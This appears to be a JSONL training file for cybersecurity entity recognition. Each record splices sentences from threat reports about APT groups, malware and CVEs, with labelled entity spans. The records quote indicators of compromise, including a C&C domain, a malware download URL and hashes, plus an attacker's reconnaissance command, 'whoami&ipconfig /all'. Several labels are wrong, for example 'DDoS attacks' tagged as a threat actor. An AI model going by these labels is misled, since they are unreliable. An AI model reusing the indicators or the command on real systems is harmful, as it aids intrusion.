{"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . Winnti : C&C : b[org_name].dnslookup.services : 443 . Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": {"TOOL: Skipper": [[87, 94]], "TOOL: Gazer": [[162, 167]], "THREAT_ACTOR: Winnti": [[200, 206]], "TOOL: C&C": [[209, 212]], "URL: b[org_name].dnslookup.services": [[215, 245]], "ORGANIZATION: Organizations": [[254, 267]]}, "info": {"id": "cyberner_stix_train_004216", "source": "cyberner_stix_train"}}
{"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production . Remexi developers use the C programming language and GCC compiler on Windows in the MinGW . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": {"THREAT_ACTOR: APT33": [[162, 167]], "ORGANIZATION: aviation sector": [[222, 237]], "ORGANIZATION: energy sector": [[272, 285]], "ORGANIZATION: petrochemical": [[299, 312]], "MALWARE: Remexi": [[326, 332]], "TOOL: C": [[352, 353]], "TOOL: GCC": [[379, 382]], "SYSTEM: Windows": [[395, 402]], "TOOL: MinGW": [[410, 415]], "TOOL: Cisco Duo": [[418, 427]]}, "info": {"id": "cyberner_stix_train_004217", "source": "cyberner_stix_train"}}
{"text": "The two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and a change in tactics .", "spans": {}, "info": {"id": "cyberner_stix_train_004218", "source": "cyberner_stix_train"}}
{"text": "Dump data from the IMO messenger app . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government . Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"SYSTEM: messenger": [[23, 32]], "MALWARE: cmd.exe": [[119, 126]], "ORGANIZATION: Palestinian government": [[361, 383]], "THREAT_ACTOR: Harrison": [[386, 394]], "ORGANIZATION: Ashley Madison": [[525, 539]]}, "info": {"id": "cyberner_stix_train_004219", "source": "cyberner_stix_train"}}
{"text": "While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": {}, "info": {"id": "cyberner_stix_train_004220", "source": "cyberner_stix_train"}}
{"text": "APT Targets Financial Analysts with CVE-2017-0199 .", "spans": {"VULNERABILITY: CVE-2017-0199": [[36, 49]]}, "info": {"id": "cyberner_stix_train_004221", "source": "cyberner_stix_train"}}
{"text": "As a result , the Trojan delete button in the list of applications becomes inactive , which may cause problems for inexperienced users . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Various network attack tools used to fingerprint and compromise other hosts on the network . The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec .", "spans": {"VULNERABILITY: CVE-2013-5065": [[180, 193]], "VULNERABILITY: EoP exploit": [[194, 205]], "TOOL: Various network attack tools": [[231, 259]], "TOOL: Cobalt Strike": [[359, 372]], "TOOL: PsExec": [[439, 445]]}, "info": {"id": "cyberner_stix_train_004222", "source": "cyberner_stix_train"}}
{"text": "The Proc1 function within the Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path to the dropped payload and executes it using the built-in Shell function .", "spans": {"FILEPATH: %APPDATA%\\MSDN\\~msdn.exe": [[71, 95]]}, "info": {"id": "cyberner_stix_train_004223", "source": "cyberner_stix_train"}}
{"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": {"THREAT_ACTOR: Mofang group": [[18, 30]], "URL: status.acmetoy.com": [[82, 100], [121, 139]], "FILEPATH: myScript.js": [[106, 117]], "FILEPATH: css.css": [[145, 152]], "ORGANIZATION: Microsoft": [[175, 184]], "VULNERABILITY: multiple zero - day vulnerabilities": [[220, 255]], "SYSTEM: Microsoft Exchange Server": [[297, 322]]}, "info": {"id": "cyberner_stix_train_004224", "source": "cyberner_stix_train"}}
{"text": "HttpBrowser 's executable code may be obfuscated through structured exception handling and return-oriented programming .", "spans": {"MALWARE: HttpBrowser": [[0, 11]]}, "info": {"id": "cyberner_stix_train_004225", "source": "cyberner_stix_train"}}
{"text": "Even though this individual ’s email id matched with the Pastebin id where base64 encoded malicious code was found , it is hard to say if this individual was or was not involved in this cyber attack .", "spans": {"TOOL: email": [[31, 36]], "TOOL: Pastebin": [[57, 65]]}, "info": {"id": "cyberner_stix_train_004226", "source": "cyberner_stix_train"}}
{"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: economic": [[135, 143]], "ORGANIZATION: Group-IB": [[167, 175]], "ORGANIZATION: banks": [[237, 242], [345, 350]], "ORGANIZATION: service provider": [[272, 288]], "ORGANIZATION: bank": [[305, 309]]}, "info": {"id": "cyberner_stix_train_004227", "source": "cyberner_stix_train"}}
{"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer , and the availability and version number of Microsoft Word . Kaspersky has more here .", "spans": {"THREAT_ACTOR: ScarCruft": [[127, 136]], "VULNERABILITY: Flash Player exploit": [[175, 195]], "VULNERABILITY: CVE-2016-4117": [[198, 211]], "TOOL: INCLUDEPICTURE": [[284, 298]], "ORGANIZATION: Microsoft": [[310, 319], [425, 434]], "TOOL: Word": [[320, 324], [435, 439]], "ORGANIZATION: Kaspersky": [[442, 451]]}, "info": {"id": "cyberner_stix_train_004228", "source": "cyberner_stix_train"}}
{"text": "Its major functionality is also implemented through the call of the asynchronous task ( “ org.starsizew.i ” ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan . Gamaredon cyberwarfare operations against Ukraine are still active . However , the self - proclaimed hacktivist group Anonymous Sudan appears to have increased KillNet ’s capabilities and the group has become the collective ’s most prolific affiliate in 2023 , conducting a majority of claimed DDoS attacks .", "spans": {"TOOL: Helminth": [[274, 282]], "TOOL: dropper Trojan": [[303, 317]], "TOOL: HerHer Trojan": [[346, 359]], "THREAT_ACTOR: Gamaredon": [[362, 371]], "THREAT_ACTOR: KillNet ’s capabilities": [[522, 545]], "THREAT_ACTOR: DDoS attacks": [[656, 668]]}, "info": {"id": "cyberner_stix_train_004229", "source": "cyberner_stix_train"}}
{"text": "Sofacy Attacks Multiple Government Entities .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004230", "source": "cyberner_stix_train"}}
{"text": "Instead , the actual content within the body of the websites was an exact match in each instance .", "spans": {}, "info": {"id": "cyberner_stix_train_004231", "source": "cyberner_stix_train"}}
{"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla . For a complete list of tools please see the MainConnectionIo section . Minidionis – one more APT with a usage of cloud drives • Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": {"MALWARE: Svpeng": [[39, 45]], "SYSTEM: Android": [[89, 96]], "TOOL: Epic Turla": [[188, 198]], "THREAT_ACTOR: Minidionis": [[272, 282]], "THREAT_ACTOR: Miniduke": [[329, 337]], "ORGANIZATION: Nemesis Gemina": [[348, 362]], "ORGANIZATION: Botgen Studio": [[371, 384]], "MALWARE: CozyDuke": [[404, 412]], "TOOL: Kaspersky Intelligence Reporting .": [[443, 477]]}, "info": {"id": "cyberner_stix_train_004232", "source": "cyberner_stix_train"}}
{"text": "We speculate that the DLL type payload will be downloaded and call its Print export function for further infection .", "spans": {"TOOL: DLL": [[22, 25]]}, "info": {"id": "cyberner_stix_train_004233", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 2a0df97277ddb361cecf8726df6d78ac .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 2a0df97277ddb361cecf8726df6d78ac": [[11, 43]]}, "info": {"id": "cyberner_stix_train_004234", "source": "cyberner_stix_train"}}
{"text": "The source process reads /proc/ [ pid ] /maps to find where libc is located in the target process memory . Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus . The attackers can also extend BLACKCOFFEE ’s functionality through additional commands sent as shellcode . Together with our partner CrySyS Lab , we ’ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": {"TOOL: BlackEnergy": [[112, 123]], "THREAT_ACTOR: Sandworm": [[132, 140]], "THREAT_ACTOR: Quedagh": [[143, 150]], "TOOL: Potao": [[155, 160]], "MALWARE: BLACKCOFFEE": [[349, 360]], "ORGANIZATION: CrySyS Lab": [[452, 462]], "MALWARE: Miniduke": [[539, 547]]}, "info": {"id": "cyberner_stix_train_004235", "source": "cyberner_stix_train"}}
{"text": "The program creates the mutex “ mtx ” and an event named “ WerTyQ34C ” .", "spans": {}, "info": {"id": "cyberner_stix_train_004236", "source": "cyberner_stix_train"}}
{"text": "We performed this comparison and found 28,881 servers that advertised a vulnerable version of SharePoint .", "spans": {"TOOL: SharePoint": [[94, 104]]}, "info": {"id": "cyberner_stix_train_004237", "source": "cyberner_stix_train"}}
{"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen . The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted . These new infection vectors rely on Java and IE vulnerabilities to infect the victim ’s PC .", "spans": {"ORGANIZATION: Kaspersky Lab": [[105, 118]], "TOOL: Octopus Trojan": [[139, 153]], "THREAT_ACTOR: APT1": [[291, 295]], "VULNERABILITY: Java and IE vulnerabilities": [[348, 375]], "ORGANIZATION: the victim ’s PC": [[386, 402]]}, "info": {"id": "cyberner_stix_train_004238", "source": "cyberner_stix_train"}}
{"text": "The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . backdoors that now appear to be part of APT15 's toolset .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "THREAT_ACTOR: FIN7": [[137, 141]], "ORGANIZATION: various companies": [[175, 192]], "ORGANIZATION: financial": [[210, 219]], "THREAT_ACTOR: APT15": [[289, 294]]}, "info": {"id": "cyberner_stix_train_004239", "source": "cyberner_stix_train"}}
{"text": "In an attempt to hide the contents of the stolen data , the threat actor used winrar to compress and password-protect it . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"THREAT_ACTOR: threat actor": [[60, 72]], "TOOL: winrar": [[78, 84]], "ORGANIZATION: Political entities": [[123, 141]], "THREAT_ACTOR: IndigoZebra": [[225, 236]], "THREAT_ACTOR: Sofacy": [[239, 245]], "MALWARE: Zebrocy": [[253, 260]], "MALWARE: malware": [[261, 268], [317, 324]], "MALWARE: Octopus": [[309, 316]]}, "info": {"id": "cyberner_stix_train_004240", "source": "cyberner_stix_train"}}
{"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"THREAT_ACTOR: PLATINUM group": [[4, 18]], "TOOL: keyloggers": [[59, 69]], "FILEPATH: attachment": [[246, 256]], "MALWARE: Trojan": [[274, 280]], "MALWARE: NetTraveler": [[290, 301]], "FILEPATH: DLL side-loading": [[310, 326]]}, "info": {"id": "cyberner_stix_train_004241", "source": "cyberner_stix_train"}}
{"text": "After the next run of the infected application , the “ boot ” module will run the “ patch ” module , which hooks the methods from known ad SDKs to its own implementation . The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists . 3 、A password-protected ZIP archive ; They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": {"TOOL: Bookworm": [[220, 228]], "ORGANIZATION: government": [[305, 315]]}, "info": {"id": "cyberner_stix_train_004242", "source": "cyberner_stix_train"}}
{"text": "SIGHT Partners is still collecting information on the mechanics of the power outage and what role the KillDisk malware played in the greater event . The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"ORGANIZATION: SIGHT Partners": [[0, 14]], "TOOL: KillDisk malware": [[102, 118]], "ORGANIZATION: Microsoft": [[181, 190]], "THREAT_ACTOR: groups": [[256, 262]], "THREAT_ACTOR: STRONTIUM": [[276, 285]], "THREAT_ACTOR: PLATINUM": [[290, 298]], "ORGANIZATION: specific individuals": [[396, 416]], "ORGANIZATION: institutions": [[421, 433]], "ORGANIZATION: military": [[452, 460]], "ORGANIZATION: intelligence agencies": [[477, 498]], "ORGANIZATION: government": [[511, 521]]}, "info": {"id": "cyberner_stix_train_004243", "source": "cyberner_stix_train"}}
{"text": "Request encoding process The HTTP requests follow the format below , while on the WebSocket only the query data is written . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": {"ORGANIZATION: IBM X-Force IRIS": [[125, 141]], "THREAT_ACTOR: ITG08’s": [[166, 173]], "TOOL: tools": [[256, 261]], "THREAT_ACTOR: APT38": [[301, 306], [437, 442]], "THREAT_ACTOR: TEMP.Hermit": [[364, 375]]}, "info": {"id": "cyberner_stix_train_004244", "source": "cyberner_stix_train"}}
{"text": "Changes in the second stage SPLM backdoor are refined , making the code reliably modular .", "spans": {"MALWARE: SPLM backdoor": [[28, 41]]}, "info": {"id": "cyberner_stix_train_004245", "source": "cyberner_stix_train"}}
{"text": "] comlila-tournai [ . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs . Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 ’s source IP addresses in Shanghai . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: civil society": [[51, 64]], "TOOL: FQDNs": [[268, 273]], "THREAT_ACTOR: APT1": [[376, 380]]}, "info": {"id": "cyberner_stix_train_004246", "source": "cyberner_stix_train"}}
{"text": "What is sure is that the gap in the Android banking malware rental business left open after the rental of the Anubis 2 and RedAlert 2 Trojans ended provides a good opportunity for the actors behind Cerberus to grow their business quickly . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": {"SYSTEM: Android": [[36, 43]], "MALWARE: Anubis 2": [[110, 118]], "MALWARE: RedAlert 2": [[123, 133]], "MALWARE: Cerberus": [[198, 206]], "THREAT_ACTOR: Machete": [[240, 247]], "THREAT_ACTOR: group": [[320, 325]], "THREAT_ACTOR: APT39": [[362, 367]], "ORGANIZATION: telecommunications sector": [[388, 413]], "ORGANIZATION: travel industry": [[449, 464]], "ORGANIZATION: IT firms": [[469, 477]], "ORGANIZATION: high-tech industry": [[502, 520]]}, "info": {"id": "cyberner_stix_train_004247", "source": "cyberner_stix_train"}}
{"text": "The mitigation strategies provided may seem like common sense .", "spans": {}, "info": {"id": "cyberner_stix_train_004248", "source": "cyberner_stix_train"}}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "THREAT_ACTOR: BalkanDoor": [[315, 325]], "VULNERABILITY: exploit": [[375, 382]], "TOOL: WinRAR": [[390, 396]], "VULNERABILITY: CVE-2018-20250": [[415, 429]]}, "info": {"id": "cyberner_stix_train_004249", "source": "cyberner_stix_train"}}
{"text": "CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016 ; the last link was created in mid-May .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "DOMAIN: hillaryclinton.com": [[57, 75]], "TOOL: email": [[76, 81]]}, "info": {"id": "cyberner_stix_train_004250", "source": "cyberner_stix_train"}}
{"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "ORGANIZATION: Muslim activists": [[137, 153]], "THREAT_ACTOR: APT37": [[267, 272]], "ORGANIZATION: board member": [[339, 351]], "ORGANIZATION: financial company": [[372, 389]]}, "info": {"id": "cyberner_stix_train_004251", "source": "cyberner_stix_train"}}
{"text": "After the profile is installed , the user will then be redirected to another Apple phishing site . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . The decoded data shows a command to be executed whoami&ipconfig /all on the victim . SysUpdate is exclusively used by Budworm .", "spans": {"ORGANIZATION: Apple": [[77, 82]], "THREAT_ACTOR: APT16": [[121, 126]], "ORGANIZATION: media": [[146, 151]], "THREAT_ACTOR: APT actors": [[172, 182]], "ORGANIZATION: government agency": [[209, 226]], "MALWARE: SysUpdate": [[454, 463]], "THREAT_ACTOR: Budworm": [[487, 494]]}, "info": {"id": "cyberner_stix_train_004252", "source": "cyberner_stix_train"}}
{"text": "During the course of this investigation , we ensured that all certificates compromised by Suckfly were revoked and the affected companies notified .", "spans": {"THREAT_ACTOR: Suckfly": [[90, 97]]}, "info": {"id": "cyberner_stix_train_004253", "source": "cyberner_stix_train"}}
{"text": "The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the “ Underwater Defence & Security 2018 Conference ” here .", "spans": {"THREAT_ACTOR: Sofacy": [[60, 66]]}, "info": {"id": "cyberner_stix_train_004254", "source": "cyberner_stix_train"}}
{"text": "For sample “ 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87 ” the following is an excerpt from the VBA macro building the PowerShell command .", "spans": {"FILEPATH: 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87": [[13, 77]], "TOOL: VBA macro": [[117, 126]], "TOOL: PowerShell": [[140, 150]]}, "info": {"id": "cyberner_stix_train_004255", "source": "cyberner_stix_train"}}
{"text": "After this announcement , the Palestinian Authority cut salaries for its employees in Gaza by 30 percent and informed Israel that it would no longer pay for electricity provided to Gaza causing blackouts throughout the area and escalating tensions between the rival groups .", "spans": {"ORGANIZATION: Palestinian Authority": [[30, 51]]}, "info": {"id": "cyberner_stix_train_004256", "source": "cyberner_stix_train"}}
{"text": "A full list of targeted applications is included in the IOC section at the end of this post . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US . It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"ORGANIZATION: Symantec": [[167, 175]], "ORGANIZATION: technology firms": [[208, 224]], "THREAT_ACTOR: FIN7": [[424, 428]], "MALWARE: FakeSG": [[464, 470]], "SYSTEM: hacked WordPress websites": [[488, 513]]}, "info": {"id": "cyberner_stix_train_004257", "source": "cyberner_stix_train"}}
{"text": "Our solution is to :", "spans": {}, "info": {"id": "cyberner_stix_train_004258", "source": "cyberner_stix_train"}}
{"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by “ start.ogg. ” It sends a request to the server with the device ’ s configuration . PittyTiger could also use CVE-2014-1761 , which is more recent . An additional campaign has also been observed targeting Japanese entities .", "spans": {"THREAT_ACTOR: PittyTiger": [[210, 220]], "VULNERABILITY: CVE-2014-1761": [[236, 249]]}, "info": {"id": "cyberner_stix_train_004259", "source": "cyberner_stix_train"}}
{"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": {"ORGANIZATION: maritime sector": [[78, 93]], "THREAT_ACTOR: XENOTIME": [[146, 154]], "ORGANIZATION: research institutions": [[299, 320]]}, "info": {"id": "cyberner_stix_train_004260", "source": "cyberner_stix_train"}}
{"text": "READ_EXTERNAL_STORAGE - read from external storage . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": {"MALWARE: installed EXE file": [[57, 75]], "MALWARE: Bisonal variant": [[125, 140]], "MALWARE: legitimate domains": [[312, 330]]}, "info": {"id": "cyberner_stix_train_004261", "source": "cyberner_stix_train"}}
{"text": "Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions . The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": {"SYSTEM: Google Play": [[18, 29], [75, 86]], "SYSTEM: Google Play Protect": [[39, 58]], "THREAT_ACTOR: PassCV": [[153, 159]], "ORGANIZATION: game companies": [[239, 253]], "ORGANIZATION: CTU": [[443, 446]], "FILEPATH: at.exe": [[628, 634]], "VULNERABILITY: CVE-2012 - 4792": [[746, 761]]}, "info": {"id": "cyberner_stix_train_004262", "source": "cyberner_stix_train"}}
{"text": "Text message and call logs were transmitted every 72 hours to the Shanghai server , and once a day for other personally identifiable data , the company says . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . Tick was spotted last year , but they are actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": {"ORGANIZATION: Rapid7": [[175, 181]], "THREAT_ACTOR: APT10": [[198, 203]], "ORGANIZATION: apparel company": [[219, 234]], "ORGANIZATION: law firm": [[305, 313]], "THREAT_ACTOR: Tick": [[323, 327]]}, "info": {"id": "cyberner_stix_train_004263", "source": "cyberner_stix_train"}}
{"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the “ IndexOffice.exe ” artifact : if true then it will delete it and it will download a new file/script from “ http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php ” . To date , the ransomware has only been used in a limited fashion .", "spans": {"ORGANIZATION: Unit 42": [[189, 196]], "ORGANIZATION: financial organizations": [[324, 347]], "FILEPATH: IndexOffice.exe": [[414, 428]], "URL: http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php": [[518, 575]], "MALWARE: ransomware": [[594, 604]]}, "info": {"id": "cyberner_stix_train_004264", "source": "cyberner_stix_train"}}
{"text": "Super Mario Run Malware # 2 – DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"MALWARE: Super Mario Run Malware": [[0, 23]], "MALWARE: DroidJack RAT": [[30, 43]], "SYSTEM: Mario": [[56, 61]], "SYSTEM: Pokemon": [[66, 73]], "THREAT_ACTOR: admin@338": [[108, 117]], "ORGANIZATION: organizations": [[139, 152]], "ORGANIZATION: financial , economic and trade policy": [[165, 202]], "TOOL: publicly available RATs": [[221, 244]], "TOOL: Poison Ivy": [[253, 263]], "TOOL: non-public backdoors": [[279, 299]], "ORGANIZATION: Microsoft": [[514, 523]]}, "info": {"id": "cyberner_stix_train_004265", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites .", "spans": {"MALWARE: them": [[22, 26]], "THREAT_ACTOR: Barium": [[236, 242]], "ORGANIZATION: social media": [[294, 306]]}, "info": {"id": "cyberner_stix_train_004266", "source": "cyberner_stix_train"}}
{"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": {"MALWARE: installed EXE file": [[176, 194]], "MALWARE: Bisonal variant": [[244, 259]]}, "info": {"id": "cyberner_stix_train_004267", "source": "cyberner_stix_train"}}
{"text": "This loads the SWF file , effectively running the malicious code on the system .", "spans": {"TOOL: SWF": [[15, 18]]}, "info": {"id": "cyberner_stix_train_004268", "source": "cyberner_stix_train"}}
{"text": "This server runs an instance of ‘ Parse Server ’ ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": {"ORGANIZATION: GitHub": [[61, 67]], "TOOL: KillDisk": [[401, 409]], "THREAT_ACTOR: attackers": [[478, 487]], "THREAT_ACTOR: cyber-sabotage": [[582, 596]], "ORGANIZATION: companies": [[679, 688]], "ORGANIZATION: government organizations": [[741, 765]]}, "info": {"id": "cyberner_stix_train_004269", "source": "cyberner_stix_train"}}
{"text": "Yamato Transport - One of Japan 's largest door-to-door delivery service companies , also in Tokyo . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Yamato Transport": [[0, 16]], "ORGANIZATION: Symantec": [[182, 190]], "THREAT_ACTOR: APT33": [[230, 235]], "THREAT_ACTOR: Gorgon Group": [[380, 392]], "ORGANIZATION: governmental organizations": [[403, 429]]}, "info": {"id": "cyberner_stix_train_004270", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "THREAT_ACTOR: Winnti Umbrella": [[291, 306]]}, "info": {"id": "cyberner_stix_train_004271", "source": "cyberner_stix_train"}}
{"text": "This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": {}, "info": {"id": "cyberner_stix_train_004272", "source": "cyberner_stix_train"}}
{"text": "This high level of cyber-espionage activity goes back years .", "spans": {}, "info": {"id": "cyberner_stix_train_004273", "source": "cyberner_stix_train"}}
{"text": "In our analysis , one activity group stood out : NEODYMIUM . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard Time ( UTC +8 ) . A bot identifier is generated from the machine’s MAC address . In an article for DarkReading , Ericka Chickowski highlights 15 key indicators of compromise", "spans": {"MALWARE: NEODYMIUM": [[49, 58]], "THREAT_ACTOR: group": [[102, 107]], "ORGANIZATION: DarkReading": [[282, 293]], "ORGANIZATION: Ericka Chickowski": [[296, 313]]}, "info": {"id": "cyberner_stix_train_004274", "source": "cyberner_stix_train"}}
